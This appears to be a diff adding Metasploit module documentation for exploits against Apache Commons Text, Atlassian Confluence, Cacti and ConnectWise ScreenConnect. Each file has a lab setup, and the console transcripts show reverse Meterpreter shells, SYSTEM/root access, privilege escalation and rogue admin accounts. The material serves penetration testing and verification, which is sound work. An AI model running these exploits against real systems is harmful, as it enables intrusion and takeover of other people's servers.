+[*] Command shell session 17 opened (172.17.0.1:4444 -> 172.17.0.2:36446) at 2023-12-23 23:04:10 +0530
+
+id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
+```
+
+Target: Linux Dropper
+```
+msf6 exploit(multi/http/apache_commons_text4shell) > set target 4
+target => 4
+msf6 exploit(multi/http/apache_commons_text4shell) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Using URL: http://172.17.0.1:8080/L8kRU1E8O/
+[*] Client 172.17.0.2 requested /L8kRU1E8O/
+[*] Sending payload to 172.17.0.2
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Command Stager progress - 100.00% done (113/113 bytes)
+[*] Meterpreter session 18 opened (172.17.0.1:4444 -> 172.17.0.2:39580) at 2023-12-23 23:04:35 +0530
+[*] Server stopped.
+
+meterpreter >
+```
+
+### Apache Commons Text 1.8 on Windows 11 home JDK 14.0.2
+
+Target: Windows EXE Dropper
+```
+msf6 exploit(multi/http/apache_commons_text4shell) > options
+
+Module options (exploit/multi/http/apache_commons_text4shell):
+
+   Name       Current Setting    Required  Description
+   ----       ---------------    --------  -----------
+   METHOD     GET                yes       The HTTP method to use (Accepted: GET, POST)
+   PARAM      search             yes       The vulnerable parameter
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     172.18.160.1       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      8080               yes       The target port (TCP)
+   SSL        false              no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  text4shell/attack  yes       The target URI
+   URIPATH                       no        The URI to use for this exploit (default is random)
+   VHOST                         no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen
+                                        on all addresses.
+   SRVPORT  5000             yes       The local port to listen on.
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.18.168.145   yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Windows EXE Dropper
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/apache_commons_text4shell) > run
+
+[*] Started reverse TCP handler on 172.18.168.145:4444
+[*] Command Stager progress -  17.01% done (2046/12025 bytes)
+[*] Command Stager progress -  34.03% done (4092/12025 bytes)
+[*] Command Stager progress -  51.04% done (6138/12025 bytes)
+[*] Command Stager progress -  68.06% done (8184/12025 bytes)
+[*] Command Stager progress -  84.24% done (10130/12025 bytes)
+[*] Sending stage (200774 bytes) to 172.18.160.1
+[*] Command Stager progress - 100.00% done (12025/12025 bytes)
+[*] Meterpreter session 5 opened (172.18.168.145:4444 -> 172.18.160.1:53165) at 2024-01-15 00:14:33 +0530
+
+meterpreter > sysinfo
+Computer        : HOME
+OS              : Windows 11 (10.0 Build 22631).
+Architecture    : x64
+System Language : en_GB
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter >
+```
+
+Target: Windows Command
+```
+msf6 exploit(multi/http/apache_commons_text4shell) > options
+
+Module options (exploit/multi/http/apache_commons_text4shell):
+
+   Name       Current Setting    Required  Description
+   ----       ---------------    --------  -----------
+   METHOD     GET                yes       The HTTP method to use (Accepted: GET, POST)
+   PARAM      search             yes       The vulnerable parameter
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     172.18.160.1       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      8080               yes       The target port (TCP)
+   SSL        false              no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  text4shell/attack  yes       The target URI
+   URIPATH                       no        The URI to use for this exploit (default is random)
+   VHOST                         no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen
+                                        on all addresses.
+   SRVPORT  5000             yes       The local port to listen on.
+
+
+Payload options (cmd/windows/powershell/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.18.168.145   yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   Windows Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/apache_commons_text4shell) > run
+
+[*] Started reverse TCP handler on 172.18.168.145:4444
+[*] Sending stage (175686 bytes) to 172.18.160.1
+[*] Meterpreter session 6 opened (172.18.168.145:4444 -> 172.18.160.1:53170) at 2024-01-15 00:15:18 +0530
+
+meterpreter > sysinfo
+Computer        : HOME
+OS              : Windows 11 (10.0 Build 22631).
+Architecture    : x64
+System Language : en_GB
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter >```
@@ -0,0 +1,141 @@
+## Vulnerable Application
+This module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses the
+injection to evaluate an OGNL expression resulting in OS command execution.
+
+Confluence versions up to and including 8.5.3 are vulnerable to this SSTI injection flaw. For more complete information
+on affected and fixed versions, see [CONFSERVER-93833][1].
+
+### Setup
+
+1. Create a new `docker-compose.yml` file with the contents below.
+2. Startup the container using `docker-compose up`
+3. Navigate to the HTTP service running on port 8090
+4. Acquire and provide an evaluation license
+5. When prompted, setup a standalone / non-clustered system
+6. Configure the database settings
+    1. Select "By connection string", then Database URL: `jdbc:postgresql://postgresql:5432/confdb`
+    2. Username and password are both `confdb`
+7. Setup takes a few minutes
+8. When prompted, select "Empty Site"
+9. Select "Manage users and groups within Confluence"
+10. Create an account, it **will not** be needed for exploitation
+11. Once setup has completed select "Start" and set a space name to something
+
+#### Docker Compose File
+
+```
+version: '3'
+
+services:
+  postgresql:
+    image: postgres:11
+    environment:
+      POSTGRES_DB: confdb
+      POSTGRES_USER: confdb
+      POSTGRES_PASSWORD: confdb
+    ports:
+      - '5432:5432'
+
+  confluence-server:
+    depends_on:
+      - postgresql
+    image: atlassian/confluence:8.5.3
+    ports:
+      - '8090:8090'
+      - '8091:8091'
+```
+
+## Verification Steps
+
+1. Follow the steps from the Setup section to create a test instance
+2. Start msfconsole
+3. Run: `use exploit/multi/http/atlassian_confluence_rce_cve_2023_22527`
+4. Set the `RHOSTS`, `PAYLOAD` and payload-related options
+5. Run the module
+
+## Options
+
+## Scenarios
+
+### Confluence 8.5.3 in [Docker]
+
+```
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set RHOSTS 192.168.159.128
+RHOSTS => 192.168.159.128
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set TARGET Unix\ Command 
+TARGET => Unix Command
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
+PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected Confluence version: 8.5.3
+[*] Detected target platform: Linux
+[+] The target is vulnerable. Successfully tested OGNL injection.
+[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
+[*] Sending stage (24772 bytes) to 192.168.159.128
+[*] Meterpreter session 8 opened (192.168.159.128:4444 -> 192.168.159.128:52920) at 2024-01-24 12:45:59 -0500
+
+meterpreter > getuid
+Server username: confluence
+meterpreter > sysinfo
+Computer        : c38aa4f3b92e
+OS              : Linux 6.6.11-200.fc39.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 10 19:25:59 UTC 2024
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > pwd
+/var/atlassian/application-data/confluence
+meterpreter >
+```
+
+### Confluence 8.5.3 on Windows Server 2019
+
+```
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set TARGET Windows\ Command 
+TARGET => Windows Command
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set PAYLOAD cmd/windows/powershell/x64/meterpreter/reverse_tcp
+PAYLOAD => cmd/windows/powershell/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > exploit
+
+[*] Powershell command length: 4371
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected Confluence version: 8.5.3
+[*] Detected target platform: Windows Server 2019
+[+] The target is vulnerable. Successfully tested OGNL injection.
+[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command)
+[*] Sending stage (200774 bytes) to 192.168.159.10
+[*] Meterpreter session 9 opened (192.168.159.128:4444 -> 192.168.159.10:58923) at 2024-01-24 12:47:39 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter > getsystem
+...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DC
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : MSFLAB
+Logged On Users : 9
+Meterpreter     : x64/windows
+meterpreter > pwd
+C:\Program Files\Atlassian\Confluence
+meterpreter > 
+```
+
+[1]: https://jira.atlassian.com/browse/CONFSERVER-93833
@@ -0,0 +1,108 @@
+## Vulnerable Application
+
+This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a
+Confluence instance administrator account. Using this account, an attacker can then perform all
+administrative actions that are available to Confluence instance administrator. This module uses the
+administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code
+execution on the target in the context of the of the user running the confluence server.
+
+### Setup
+Download and install a [vulnerable version of Atlassian Confluence](https://www.atlassian.com/software/confluence/download.).
+By default the server will listen for HTTP connections on port 8090. This exploit module was tested against Confluence
+8.5.1 running on Windows Server 2022.
+
+After running the installer the setup wizard will ask for a trial license. An Atlassian account is free and required
+to obtain the trial licence. A database and a will also be required to run Confluence. Download and install
+[PostgreSQL](https://www.enterprisedb.com/downloads/postgres-postgresql-downloads). The setup Wizard will ask for DB
+credentials, the default PostgreSQL database can be used.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use atlassian_confluence_unauth_backup`
+1. Set the `RHOST`
+1. Run the module
+1. Receive a Meterpreter session in the context of the user running the Confluence application.
+
+## Options
+
+### CONFLUENCE_TARGET_ENDPOINT
+
+This is the endpoint used to trigger the vulnerability, and must be reachable by an un authenticated HTTP(S) POST
+request. The three vulnerable endpoints outlined by Atlassian in the advisory for this vulnerability are as follows:
+ - /json/setup-restore.action
+ - /json/setup-restore-local.action
+ - /json/setup-restore-progress.action'
+
+### CONFLUENCE_PLUGIN_TIMEOUT
+
+The exploit will install a malicious plugin into the Confluence server. Plugin installation is performed asynchronously
+and we must poll the server to find out when installation has completed. This option governs the maximum amount
+of time to wait for installation to complete. The timeout value is in seconds and by default this option is set to `30`.
+
+## Scenarios
+### Windows Server 2022 running Atlassian Confluence 8.5.1
+```
+msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > set rhost 172.16.199.134
+rhost => 172.16.199.134
+msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > set verbose true
+verbose => true
+msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > options
+
+Module options (exploit/multi/http/atlassian_confluence_unauth_backup):
+
+   Name                        Current Setting             Required  Description
+   ----                        ---------------             --------  -----------
+   CONFLUENCE_PLUGIN_TIMEOUT   30                          yes       The timeout (in seconds) to wait when installing a plugin
+   CONFLUENCE_TARGET_ENDPOINT  /json/setup-restore.action  yes       The endpoint used to trigger the vulnerability. (Accepted: /json/setup-restore.action, /json/setup-restore-local.action, /json/setup-restore-progress.action)
+   NEW_PASSWORD                LELTtnOG                    yes       Password to be used when creating a new user with admin privileges
+   NEW_USERNAME                candace.leffler             yes       Username to be used when creating a new user with admin privileges
+   Proxies                                                 no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      172.16.199.134              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT                       8090                        yes       The target port (TCP)
+   SSL                         false                       no        Negotiate SSL/TLS for outgoing connections
+   VHOST                                                   no        HTTP server virtual host
+
+
+Payload options (java/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Java
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Exploitable version of Confluence: 8.5.1
+[*] Setting credentials: candace.leffler:LELTtnOG
+[+] Exploit Success! Login Using 'candace.leffler :: LELTtnOG'
+[*] Generating payload plugin
+[*] Uploading payload plugin
+[*] Triggering payload plugin
+[*] Deleting plugin...
+[*] Sending stage (57692 bytes) to 172.16.199.134
+[*] Meterpreter session 6 opened (172.16.199.1:4444 -> 172.16.199.134:50095) at 2023-12-11 18:52:33 -0500
+
+meterpreter > getuid
+Server username: WIN-2EEL7BRDUD8$
+meterpreter > sysinfo
+Computer        : WIN-2EEL7BRDUD8
+OS              : Windows Server 2022 10.0 (amd64)
+Architecture    : x64
+System Language : en_US
+Meterpreter     : java/windows
+meterpreter >
+```
@@ -0,0 +1,244 @@
+## Vulnerable Application
+
+This exploit module leverages a SQLi (CVE-2023-49085) and a LFI (CVE-2023-49084) vulnerability in Cacti versions prior to 1.2.26 to achieve RCE. Authentication is needed and the account must have access to the vulnerable PHP script (`pollers.php`). This is granted by setting the `Sites/Devices/Data` permission in the `General Administration` section.
+
+The module implements a `check` method that makes sure `pollers.php` is accessible. It also tries to run a basic time-cased SQL injection that will confirm if the application is vulnerable. It also bypass the [fix](https://github.com/Cacti/cacti/commit/4beb66dbe2c571c3216834c029bde2e951b401cf#diff-60434fdc6c83f03e69846c2640319eeee39da1b477e76e1ca0dca0519bbc9651) added in version 1.2.25.
+
+The exploit will do the following:
+- Login with the provided credentials
+- Perform a series of SQL injections to:
+  - backup the current log file path and add a new path to the `settings` table
+  - insert the new log file path to the External Links table (`external_links`)
+  - add permission to access this external link to the current user (`user_auth_realm`)
+  - Poison the log file to add the payload stager
+- Trigger the payload by accessing the external link page (`link.php)`
+- Cleanup the SQL tables that were modified to their original states
+- Remove the new log file that contains the stager
+
+### Docker installation of Cacti version 1.2.25
+- Create the following files (based on the files from [here](https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169)):
+  - `docker-compose.yml`:
+    ```
+    version: '2'
+    services:
+      web:
+        build: ./cacti
+        ports:
+         - "8080:80"
+        depends_on:
+         - db
+        entrypoint:
+         - bash
+         - /entrypoint.sh
+        volumes:
+         - ./entrypoint.sh:/entrypoint.sh
+        command: apache2-foreground
+      db:
+       image: mysql:5.7
+       environment:
+        - MYSQL_ROOT_PASSWORD=root
+        - MYSQL_DATABASE=cacti
+    ```
+  - `entrypoint.sh`:
+    ```
+    #!/bin/bash
+    set -ex
+
+    wait-for-it db:3306 -t 300 -- echo "database is connected"
+    if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
+        mysql --host=db --user=root --password=root cacti < /var/www/html/cacti/cacti.sql
+        mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
+        mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
+    fi
+
+    chown www-data:www-data -R /var/www/html
+    # first arg is `-f` or `--some-option`
+    if [ "${1#-}" != "$1" ]; then
+      set -- apache2-foreground "$@"
+    fi
+
+    exec "$@"
+    ```
+- Create a `./cacti/` directory with `mkdir cacti`
+- Add the following files in the `./cacti/` folder (based on the files from [here](https://github.com/vulhub/vulhub/tree/master/base/cacti/1.2.22):
+  - `Dockerfile`:
+    ```
+    FROM php:7.4-apache
+
+    RUN apt-get update && \
+        apt-get install -y --no-install-recommends rrdtool snmp wget ca-certificates libsnmp-dev default-mysql-client \
+                wait-for-it libjpeg62-turbo-dev libpng-dev libfreetype6-dev libgmp-dev libldap2-dev libicu-dev
+
+    RUN docker-php-ext-configure gd --with-freetype --with-jpeg &&\
+        docker-php-ext-configure intl &&\
+        docker-php-ext-configure pcntl --enable-pcntl &&\
+        docker-php-ext-install pdo_mysql snmp gmp ldap sockets gd intl pcntl gettext
+
+    RUN mkdir /var/www/html/cacti &&\
+        wget -qO- https://files.cacti.net/cacti/linux/cacti-1.2.25.tar.gz | tar zx -C /var/www/html/cacti --strip-components 1
+
+    COPY config.php /var/www/html/cacti/include/config.php
+    COPY cacti.ini /usr/local/etc/php/conf.d/cacti.ini
+    ```
+  - `cacti.ini`
+    ```
+    display_errors=off
+    memory_limit=512M
+    date.timezone=UTC
+    max_execution_time=120
+    ```
+  - `config.php`
+    ```
+    <?php
+    $database_type     = 'mysql';
+    $database_default  = 'cacti';
+    $database_hostname = 'db';
+    $database_username = 'root';
+    $database_password = 'root';
+    $database_port     = '3306';
+    $database_retries  = 5;
+    $database_ssl      = false;
+    $database_ssl_key  = '';
+    $database_ssl_cert = '';
+    $database_ssl_ca   = '';
+    $database_persist  = false;
+    $poller_id = 1;
+    $url_path = '/cacti';
+    $cacti_session_name = 'Cacti';
+    $cacti_db_session = false;
+    $disable_log_rotation = false;
+    ```
+- Run `docker-compose up`
+- Access http://127.0.0.1:8080
+- Login with the `admin` user (password: `admin`)
+- Follow the installation steps (accept every default settings and ignore the pre-installation checks suggestions)
+
+Note that other version can be installed this way by changing the `tar` file name in `Dockerfile` (`cacti-1.2.25.tar.gz`).
+
+
+### Cacti on Windows
+Download and run a Cacti installer from [here](https://files.cacti.net/cacti/windows/Archive/). The `admin` password should be put in a file called `Cacti-Passwords.txt` by the installer, which is in the same location the installer was run.
+Follow the same installation steps as for the Docker installation.
+
+
+### Setup a new user
+- Login with the `admin` user (password: `admin`)
+- Go to `Configuration` > `Users`
+- Click on the `+` sign
+- Enter the `User Name`, `Password` and check the `Enabled` option.
+- Click `Create`
+- Go to the `Permissions` tab and set the `Sites/Devices/Data` permission in `General Administration`
+- Click `Save`
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/multi/http/cacti_pollers_sqli_rce`
+1. Do: `set target <target>`
+1. Do: `set payload <payload>`
+1. Do: `run rhost=<target address> rport=<target port> lhost=<local address> username=<username> password=<password>`
+1. You should get a shell.
+
+## Options
+
+### USERNAME
+The user to login with (default `admin`).
+
+### PASSWORD
+The password to login with (default `admin`)
+
+### TARGETURI
+The base URI of Cacti (default `/cacti`).
+
+
+## Scenarios
+
+### Cacti version 1.2.25 on Docker installation
+```
+msf6 exploit(multi/http/cacti_pollers_sqli_rce) > set target 0
+target => 0
+msf6 exploit(multi/http/cacti_pollers_sqli_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/cacti_pollers_sqli_rce) > run rhost=127.0.0.1 rport=8080 lhost=192.168.144.1 username=msfuser password=12345678
+
+[*] Started reverse TCP handler on 192.168.144.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking Cacti version
+[+] The web server is running Cacti version 1.2.25
+[*] Attempting login with user `msfuser` and password `12345678`
+[+] Logged in
+[*] Checking permissions to access `pollers.php`
+[*] Attempting SQLi to check if the target is vulnerable
+[+] The target is vulnerable.
+[*] Backing up the current log file path and adding a new path (log/cacti520.log) to the `settings` table
+[*] Inserting the log file path `log/cacti520.log` to the external links table
+[*] Getting the user ID and setting permissions (it might take a few minutes)
+[*] Logging again to apply new settings and permissions
+[*] Getting the CSRF token to login
+[*] Attempting login with user `msfuser` and password `12345678`
+[+] Logged in
+[*] Poisoning the log
+[*] Triggering the payload
+[*] Sending stage (3045380 bytes) to 192.168.144.1
+[*] Cleaning up log file
+[*] Meterpreter session 8 opened (192.168.144.1:4444 -> 192.168.144.1:51181) at 2024-01-29 22:00:19 +0100
+[*] Cleaning up external link using SQLi
+[*] Cleaning up permissions using SQLi
+[*] Cleaning up the log path in `settings` table using SQLi
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : 172.25.0.3
+OS           : Debian 11.5 (Linux 6.5.11-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+### Cacti version 1.2.24 on Windows 11
+```
+msf6 exploit(multi/http/cacti_pollers_sqli_rce) > set target 1
+target => 1
+msf6 exploit(multi/http/cacti_pollers_sqli_rce) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/cacti_pollers_sqli_rce) > run rhost=192.168.144.134 lhost=192.168.144.1 username=msfuser password=12345678
+
+[*] Started reverse TCP handler on 192.168.144.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking Cacti version
+[+] The web server is running Cacti version 1.2.24
+[*] Attempting login with user `msfuser` and password `12345678`
+[+] Logged in
+[*] Checking permissions to access `pollers.php`
+[*] Attempting SQLi to check if the target is vulnerable
+[+] The target is vulnerable.
+[*] Backing up the current log file path and adding a new path (log/cacti715.log) to the `settings` table
+[*] Inserting the log file path `log/cacti715.log` to the external links table
+[*] Getting the user ID and setting permissions (it might take a few minutes)
+[*] Logging again to apply new settings and permissions
+[*] Getting the CSRF token to login
+[*] Attempting login with user `msfuser` and password `12345678`
+[+] Logged in
+[*] Poisoning the log
+[*] Triggering the payload
+[*] Sending stage (200774 bytes) to 192.168.144.134
+[*] Cleaning up log file
+[*] Meterpreter session 7 opened (192.168.144.1:4444 -> 192.168.144.134:64144) at 2024-01-29 21:58:59 +0100
+[*] Cleaning up external link using SQLi
+[*] Cleaning up permissions using SQLi
+[*] Cleaning up the log path in `settings` table using SQLi
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-26CQRHP
+OS              : Windows 11 (10.0 Build 22000).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+```
@@ -0,0 +1,287 @@
+## Vulnerable Application
+This module exploits an authentication bypass vulnerability that allows an unauthenticated attacker to create
+a new administrator user account on a vulnerable ConnectWise ScreenConnect server. The attacker can leverage
+this to achieve RCE by uploading a malicious extension module. All versions of ScreenConnect version 23.9.7
+and below are affected.
+
+**Note:** The vulnerability will replace the ScreenConnect systems existing User.xml file, meaning existing user
+accounts will be removed after exploitation.
+
+## Testing
+* Download a vulnerable version of the software by visiting: 
+  * https://screenconnect.connectwise.com/download/archive, for example download the file
+[ScreenConnect_23.9.7.8804_Release.msi](https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_23.9.7.8804_Release.msi) or
+[ScreenConnect_21.14.5924.8013_Release.msi](https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.14.5924.8013_Release.msi).
+* Request a trial license if you do not already have one.
+* On a Windows system, click through the installer to install the product and complete the installation in your
+web browser as instructed. 
+* Once completed, you can login by visiting http://127.0.0.1:8040/ in your browser.
+
+## Verification Steps
+1. Start msfconsole
+2. `use exploit/multi/http/connectwise_screenconnect_rce_cve_2024_1709`
+3. `set target 0`
+4. `set payload windows/x64/meterpreter/reverse_tcp`
+5. `set LHOST eth0`
+6. `set RHOST <TARGET_IP_ADDRESS>`
+7. `check`
+8. `exploit`
+
+## Options
+
+### USERNAME
+The username to use when creating a new administrator user account. Will default to a random 8 character value. This
+value must not be empty.
+
+### PASSWORD
+The password to use when creating a new administrator user account. Will default to a random 16 character value. This
+value must not be empty and must be 8 characters or more.
+
+## Scenarios
+
+### Windows In-Memory
+
+```
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > set target 0
+target => 0
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > set LHOST eth0
+LHOST => eth0
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > set RHOST 192.168.86.50
+RHOST => 192.168.86.50
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > show options
+
+Module options (exploit/multi/http/connectwise_screenconnect_rce_cve_2024_1709):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.86.50    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    8040             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     eth0             yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows In-Memory
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > check
+[*] 192.168.86.50:8040 - The target appears to be vulnerable. ConnectWise ScreenConnect 23.9.7 running on Windows.
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. ConnectWise ScreenConnect 23.9.7 running on Windows.
+[*] Created account: qyxzcxgk:SMsGSJCbcTaJZ5f2 (Note: This account will not be deleted by the module)
+[*] Uploaded Extension: 81060d26-6fc8-5d1a-0566-b6f0503a8934
+[*] Removing Extension: 81060d26-6fc8-5d1a-0566-b6f0503a8934
+[*] Sending stage (201798 bytes) to 192.168.86.50
+[+] Deleted C:\Program Files (x86)\ScreenConnect\App_Extensions\fuypfhwx.ashx
+[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:50536) at 2024-02-22 14:42:13 +0000
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-V28QNSO2H05
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Meterpreter     : x64/windows
+meterpreter > pwd
+C:\Windows\system32
+meterpreter > exit
+[*] Shutting down session: 1
+
+[*] 192.168.86.50 - Meterpreter session 1 closed.  Reason: Died
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) >
+```
+
+#### Windows Command
+Note: The `FETCH_WRITABLE_DIR` should be set to a suitable value like `%TEMP%`.
+
+```
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > set target 1
+target => 1
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > set FETCH_COMMAND CERTUTIL 
+FETCH_COMMAND => CERTUTIL
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > set FETCH_WRITABLE_DIR %TEMP%
+FETCH_WRITABLE_DIR => %TEMP%
+msf6 exploit(multi/http/connectwise_screenconnect_rce_cve_2024_1709) > show options
+
+Module options (exploit/multi/http/connectwise_screenconnect_rce_cve_2024_1709):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
